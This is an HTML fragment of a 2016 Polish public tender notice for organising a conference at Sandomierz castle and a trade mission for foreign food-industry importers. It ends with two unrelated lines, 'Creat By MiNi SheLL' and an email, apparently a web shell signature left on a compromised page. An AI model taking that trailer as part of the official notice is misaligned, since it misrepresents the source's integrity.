<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce i data wydarzenia: Zamek królewski w Sandomierzu w województwie świętokrzyskim w dniu 26.08.2016 roku
Uwaga!
Konferencja obędzie się w Sali Rycerskiej na Zamku Królewskim w Sandomierzu. Sala jest zarezerwowana przez Zamawiającego w godzinach od 9:00 do 16:00 w dniu 26.08.2016 roku. Wykonawca wyłoniony do realizacji zamówienia zobowiązany będzie ponieść koszty wynajmu sal w kwocie 3290 zł brutto (w w/w godzinach) - według kosztorysu: Sala Rycerska 350zł/h x 7h = 2450zł brutto (w tym nagłośnienie, rzutnik, ekran, pomieszczenie baszty południowej) oraz pomieszczenie po byłej kawiarni 120zł/h x 7h = 840zł brutto 
(w tym zaplecze kuchnia) do rozmów biznesowych. Koszt wynajęcia tych pomieszczeń Wykonawca musi uwzględnić w cenie oferty. Wyposażenie techniczne sali, zgodne ze specyfikacją, jest dodatkowo płatne przez Wykonawcę.
W ramach zamówienia do zadań wykonawcy należeć będzie m.in.:
a)zapewnienie sali konferencyjnej wraz z wyposażeniem; 
b)zapewnienie tłumaczenia symultanicznego i konsekutywnego;
c)zapewnienie recepcji konferencji;
d)zapewnienie usługi cateringowej podczas konferencji;
e)zorganizowanie kolacji;
f)obsługa konferencji, wydrukowanie programu konferencji oraz zaproszeń, wykonanie identyfikatorów, smyczy i innych materiałów konferencyjnych;
g)udokumentowanie fotograficzne przebiegu Konferencji oraz przygotowanie informacji podsumowującej konferencję;
h)opracowanie i przeprowadzenie ankiety ewaluacyjnej. 
Zamawiający wymaga zapewnienia podczas całej konferencji opiekuna, który podczas całego czasu jej trwania zajmie się koordynacją prawidłowego jej przebiegu oraz będzie czuwał nad sprawnym i terminowym przebiegiem konferencji na miejscu i rozwiązywaniem ewentualnych problemów, które wynikną w trakcie realizacji.
Szczegółowy opis części I zamówienia zawarty jest w załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie wykonawcy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> usługa kompleksowej organizacji przyjazdowej misji gospodarczej zagranicznych przedsiębiorców  handlowców  importerów z branży spożywczo-przetwórczej w dniach 24- 27 sierpnia 2016r., realizowanej ze środków Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Głównym tematem misji gospodarczej będzie promocja sektora spożywczo-przetwórczego regionu świętokrzyskiego poza Polską oraz nawiązanie nowych trwałych kontaktów handlowych na zagranicznych rynkach. 
Misja gospodarcza będzie trwała 4 dni (wraz z przylotem i wylotem zagranicznych uczestników misji) i odbędzie się w dniach 24 - 27 sierpnia 2016r. w Sandomierzu i jego okolicach.
Uczestnicy przyjazdowej misji gospodarczej to przedsiębiorcy, handlowcy i importerzy z branży spożywczo-przetwórczej - łącznie 16 osób (2 osoby z Niemiec, 2 osoby z Wielkiej Brytanii, 2 osoby z Bułgarii, 2 osoby z Chorwacji, 2 osoby z Węgier, 2 osoby z Rumunii, 2 osoby z Serbii, 1 osobę z Iranu oraz 1 osobę z Algierii.
Zamawiający wymaga, aby wykonawca zapewnił min. 1 (jednego) tłumacza,  konsekutywnego, który posługuje się biegłą znajomością języka polskiego i angielskiego  i który to będzie towarzyszyć uczestnikom misji gospodarczej przez cały czas jej trwania.
Liczba osób reprezentujących Zamawiającego (Urząd Marszałkowski Województwa Świętokrzyskiego - COIiP) to 4 osoby.
W ramach misji do zadań Wykonawcy należeć będzie m.in.:
a) zabezpieczenie logistyczne misji gospodarczej, w tym: transport, ubezpieczenie uczestników, zakwaterowanie, wyżywienie.
b)obsługa misji gospodarczej zagranicznych przedsiębiorców z zakresie zapewnienia tłumaczenia ustnego konsekutywnego.
c)zapewnienie identyfikatorów z etui oraz smyczy dla wszystkich uczestników przyjazdowej misji gospodarczej.
d)prowadzenie listy obecności.
e)opracowanie i przygotowanie pisemnego raportu podsumowującego misję.
Wykonawca zobowiązany będzie do posiadania polisy - umowy ubezpieczenia uczestników misji i do przedłożenia Zamawiającemu oryginału polisy lub jej kopii potwierdzonej za zgodność z oryginałem - nie później niż 24 godziny przed terminem przyjazdu.
Szczegółowy zakres i opis przedmiotu zamówienia części II zawiera załącznik Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8, 55.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie wykonawcy - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com